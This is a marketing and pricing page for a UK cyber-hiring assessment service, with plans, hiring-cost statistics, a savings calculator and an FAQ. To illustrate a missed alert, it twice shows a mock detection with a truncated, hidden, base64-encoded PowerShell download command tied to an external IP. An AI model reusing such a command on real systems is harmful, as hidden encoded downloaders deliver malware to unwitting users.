CyberHire

The bit nobody puts on a pricing page

The real cost isn't the subscription. It's dropping the ball.

Hiring cyber roles is the highest-consequence decision your team makes. Every gap, every rushed offer, every "they interviewed really well" has a consequence down the line. Make your hiring decisions defensible.

Free Trial

Kick the tyres for two weeks.

£0 /mo

14 days, no card

  • 5 candidate invites
  • 1 team seat
  • Library access (limited)
  • 3 AI credits
  • Standard integrity
  • Secure & Proctor modes (not included)
  • Custom branding

Starter

For growing teams.

£299 /mo, billed monthly
£249 /mo, £2,988 billed annually

  • 25 attempts / month
  • 3 team seats
  • Library of 75 challenges
  • 10 AI credits / month
  • Standard + Secure integrity
  • Proctor mode (not included)
  • Custom branding
Most popular

Pro

Hiring often. Multiple roles. Branded.

£799 /mo, billed monthly
£669 /mo, £8,028 billed annually

  • 250 attempts / month
  • 10 team seats
  • Full library (155+ challenges)
  • 30 AI credits / month
  • All three integrity tiers
  • Custom branding
  • Custom email templates

Enterprise

MSSPs and larger security functions.

£1,499 /mo, billed monthly
£1,249 /mo, £14,988 billed annually

  • 500 attempts / month
  • Unlimited team seats
  • Full library + early access
  • 75 AI credits / month
  • All three integrity tiers
  • Custom branding
  • Dedicated account manager

Our Starter plan costs about 30% of one day's billable consultancy.

The state of UK cyber hiring, if you're brave enough to look

12 weeks

Time-to-fill for a typical UK cyber role. Senior roles stretch to 6 months.

DCMS Cyber Security Skills in the UK Labour Market, 2024

£15,000

Typical recruiter placement fee on a £75k cyber hire. Before anyone touches a keyboard.

Hays Cyber Salary Guide UK, 2024

71%

Of SOC analysts report burnout. Every vacancy makes the rest of the team more likely to walk.

Tines Voice of the SOC, 2024

11,200

Annual UK cyber workforce shortfall. The maths does not work without better hiring.

DCMS Cyber Security Skills in the UK Labour Market, 2024

02:17 AM · A Tuesday

Nobody gets breached because the SIEM failed.

It happens because the person watching it marked the alert as a false positive, closed the ticket, and went back to their coffee. Detection and response is only as good as the eyeballs monitoring it.

detections · queue · 02:17:04 UTC
Critical · ALT-8847291

Encoded PowerShell via LOLBin · outbound to AS12389

Host: WKST-FIN-0043
Dest: 194.67.204.12 · RU
MITRE: T1059.001 · T1140

$ powershell.exe -nop -w hidden -enc JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQ...

The seven-figure detection stack did its job. It fired the alert. What happens next is the part nobody budgets for.

What happens next

  1. 02:17

    Alert closed as false positive

    One click. Ticket gone. Coffee refilled.

  2. 02:41

    Lateral movement begins

    Beacon pivots to the file server. Nobody paging.

  3. 04:32

    Ransomware detonates

    214 endpoints encrypted before the next shift starts.

  4. 09:00

    The board call

    CISO on the phone to the cyber insurer. The SIEM logs are immaculate.

Why it happened

The industry has a problem. We're doing things backwards.

What every framework says

  1. Start with People (~60%)
  2. Write the Process (~25%)
  3. Deploy the Technology (~15%)

NIST. ISO 27001. SANS. CIS. Pick any framework. They all start here.

Where the money actually goes

  1. Throw money at Technology (~80%)
  2. Paper over with Process (~15%)
  3. Whatever is left over for People (~5%)

The seven-figure SIEM. All-singing all-dancing XDR. Zero-trust. NIDS. IAM. DLP. All the gear, no idea.

The frameworks lead with people because they are the foundation. A capable team will build the processes that ensure your technology stack is adequately scoped, configured, deployed and monitored.

02:17 AM · Same alert, different call

The Tuesday that didn't break.

Same SIEM. Same queue. Same 02:17 alert. A different hand on the mouse. This is what people-first looks like when it's done properly.

detections · queue · 02:17:04 UTC
Critical · ALT-8847291

Encoded PowerShell via LOLBin · outbound to AS12389

Host: WKST-FIN-0043
Dest: 194.67.204.12 · RU
MITRE: T1059.001 · T1140

$ powershell.exe -nop -w hidden -enc JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQ...

Same alert. Same queue. Same 7h 43m on shift. The only variable that changed is how the person at the keyboard got there.

What happens instead

  1. 02:17

    Alert escalated correctly

    Tier 2 paged. Playbook opened. Zero hesitation.

  2. 02:21

    IOCs confirmed, host isolated

    MTTD: 4 minutes. The beacon never got its second callback.

  3. 02:34

    Containment complete

    MTTR: 17 minutes. Lateral movement halted before the pivot.

  4. 09:00

    Morning stand-up

    Audit trail filed. No breach. No disclosure. No phone call to the insurer.

The downstream effect

What a capable team does to your security metrics.

01 · MTTD

Alerts actioned at 02:17, not 09:00.

The hand on the mouse catches what matters. Detection stops being a graveyard shift nobody trusts.

The one that matters

Fewer incidents ever reach the threshold where you have to call the regulators.

The breach that never happened is the strongest KPI you have. Capable analysts keep more incidents on your side of the disclosure line. The board call you never had to make.

Breach risk · down

02 · MTTR

Containment in minutes, not days.

The playbook gets run, not read. Lateral movement stops at the pivot, not the post-mortem.

03 · Dwell time

Attackers evicted before they get comfortable.

Persistence kicked out, accounts rotated, host isolated. No weeks-long stays in your environment.

04 · Compliance

Audit-ready because the work happens.

The controls work because a capable team runs them. Evidence writes itself, not the wiki.

05 · Triage accuracy

The real threat doesn't get closed by accident.

A capable analyst triages under pressure. True positives get escalated. False positives get closed. Nothing important buried in the routine clicks.

This is what people-first looks like when you fund it. The stack you already paid for, finally earning its keep.

Consultants usually charge for this

So what's the real cost? Let's run the numbers.

Your current spend isn't just money. It's your team drowning. It's the mis-hire on a PIP. It's the incident the security team missed. Here's what it looks like.

Your situation

Tell us how you hire today

The honest breakdown

Where your money goes today

Current annual hiring cost, per year

  • Recruiter fees
  • Team time on screening + interviews
  • Unfilled-role productivity loss
  • Cost of bad hires (conservative)

CyberHire Pro cost, per year

Where CyberHire saves you money

  • Screening + interview time
  • Faster time-to-fill
  • Fewer bad hires
  • Minus CyberHire plan

Net annual saving

You build a team you can defend in a board meeting. In a fraction of the time. With fewer bets you'll regret.

And the stuff you can't put on a spreadsheet

Weeks of senior engineering time, back in your calendar. Not in interview rooms.

Days of role vacancy eliminated across the year. Faster shortlists, fewer gaps in coverage.

Mis-hires that you don't have to unwind six months from now. No awkward conversations. No re-recruiting.

Stronger posture

Every seat filled faster is one fewer gap in your defences. The average UK breach costs £3.58m.

Honest assumptions. We do not claim to reduce recruiter fees. If you use recruiters, you'll keep using them. What we do: compress screening + interviewing to ~35% of current hours, cut time-to-fill by ~30%, and slash your bad-hire rate to ~20% of baseline (tests on real tools expose the people who interview well but can't do the job). Loaded hourly cost modelled as salary × 1.5 ÷ 1,820 working hours. Numbers rounded. The buckets you'd still spend on with CyberHire are left out of the savings number. Your mileage will vary.

Just the financial part

One wrong cyber hire costs more than a decade of CyberHire.

A bad UK cyber hire runs between 30% and 3x first-year salary once you tot up wasted pay, severance, rehiring, ramp time, and the drag on everyone who had to cover. On a £75k role that's £22,500 at the floor, £225,000 at the ceiling.

Low-end estimate

£22,500

30% of first-year salary. US Department of Labor floor, widely quoted as conservative.

Defensible UK mid-range

£132,015

On a £42k mid-manager, per REC and Oxford Economics. 3.15x salary once everything is tallied.

Senior / CISO mis-hire

£225,000+

3x first-year salary on a £75k role. Higher still for heads of security where the risk of a breach enters the equation.

Sources: REC & Oxford Economics, CIPD Resourcing Survey, US BLS via SHRM. IBM Cost of a Data Breach 2024 for the breach figure. Tines Voice of the SOC 2024 for the attrition one. Every number on this page can be traced back to its source.

Come back if you want a call

Try it.
You'll never go back.

14 days free. Invitation only. Request a code, get up and running in minutes. No demo required. No sales call required.

14 days free · No credit card · Code in your inbox once we have reviewed

Questions worth answering

FAQ.

Do I need to book a sales call to see pricing?

No. Every plan, every price, every limit is on this page. We do not believe in gatekeeping pricing.

Why is Pro the most popular plan?

Because it is the one that pays for itself fastest. At £799 a month you get 250 attempts, the full challenge library (including the Linux Terminal, PowerShell and KQL simulators), AI-generated custom tests, custom branding, all three integrity tiers, and priority support. If you hire more than two cyber roles a year, Pro will save you more than it costs in the first placement.

This feels expensive for a hiring tool. Is it worth it?

Compare it to the alternative. A single UK cyber placement through a recruiter averages £15,000 at 20% of a £75k salary. The annual cost of Pro is £8,028. If CyberHire helps you replace one recruiter engagement, or catch one mis-hire before they sign, the rest of the year is free. The calculator above does the maths against your own numbers.

We only hire occasionally. Does this still make sense?

Yes if you care about who you hire. One bad cyber hire in the UK costs between 30% and 3x first-year salary once you factor wasted pay, severance, rehiring and team impact. On a £75k role that is £22,500 on the low end, £225,000 on the high end. Starter at £249 a month pays for itself the first time you avoid one. If you hire fewer than four roles a year and never use recruiters, Starter is the right tier.

Is there a free trial?

Yes. 14 days, no credit card. The trial gives you 5 invites, 1 seat, library access (limited), 3 AI credits, and Standard integrity settings. More than enough to try the product and see whether you like it.

How do you measure usage, invites or attempts?

We measure attempts. An attempt is one person taking your hiring test. We do not deduct from your monthly allowance for inviting candidates, only for the candidates who actually start a test.

What are the three integrity tiers?

Standard tracks tab switching, copy and paste, and keystroke patterns with no enforcement. Secure adds enforcement on top: forced fullscreen and blocked copy/paste. Proctor adds periodic webcam monitoring during the test, with explicit candidate consent. You pick the tier per assessment. Standard is on every plan, Secure is included from Starter, Proctor is included from Pro.

Can I switch plans mid-cycle?

Yes. Upgrades take effect immediately and we prorate the difference. Downgrades take effect at the end of the current billing cycle so you do not lose what you already paid for.

What is an AI credit?

One AI credit generates one custom test or one custom challenge from a job spec or a description. Credits refresh monthly. Unused credits do not roll over. Top-up packs are available if you burn through your monthly allowance.

Do you offer custom plans for MSSPs or enterprise security teams?

Yes. Enterprise covers most teams above 500 attempts a month. If you need more attempts, SSO, or a custom contract, get in touch.

What happens to our data if we cancel?

You stay on read-only access for 30 days so you can export results and candidate histories. After 30 days we schedule a full purge. Nothing is retained beyond the statutory minimums.

Where is candidate data stored?

United Kingdom. All processing happens in the UK. We are a UK GDPR-aligned data controller. The candidate privacy notice and data processing addendum are linked in the footer.

What payment methods do you accept?

Card payments through Stripe. Annual contracts can be invoiced (Net 15) on Pro and Enterprise if you need a purchase order.

Can I cancel anytime?

Yes. Cancel from the billing page. No retention call, no exit interview, no email sequence trying to talk you out of it.